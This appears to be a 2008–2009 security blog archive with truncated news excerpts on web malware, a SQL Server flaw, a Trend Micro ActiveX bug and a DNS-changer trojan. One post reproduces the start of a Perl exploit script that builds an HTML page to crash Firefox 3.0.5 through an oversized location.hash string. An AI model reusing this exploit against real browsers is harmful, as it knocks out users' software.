Monday, January 26th, 2009
A social networking site operated by the 2008 Barack Obama campaign is serving up malware to unwary visitors a full week after the tactic was reported, a security researcher said today.
My.BarackObama.com, still active after the innauguration last week of President Obama, is being used by hackers trying to dupe users ...
Posted in Internet, Privacy, Security | No Comments
Tuesday, December 23rd, 2008
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [
[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n\n";
}
$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" ...
Posted in Coding, Internet, Security | No Comments
Monday, December 22nd, 2008
Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line.
The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...
Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments
Monday, December 22nd, 2008
A bug in Trend Micro's free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned.
Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users ...
Posted in Coding, Internet, Security | No Comments
Sunday, December 21st, 2008
DNS Changer 2.0 (Trojan.Flush.M) is the next –in the wild- variant of this famous malware. Now the strategy has been changed, no need to modify the DNS settings on ADSL routers. Instead it will install a network driver (NDISProt.sys) which allows the malware to send/receive raw Ethernet packets. Such approach ...
Posted in Internet, Networking, Privacy, Security | No Comments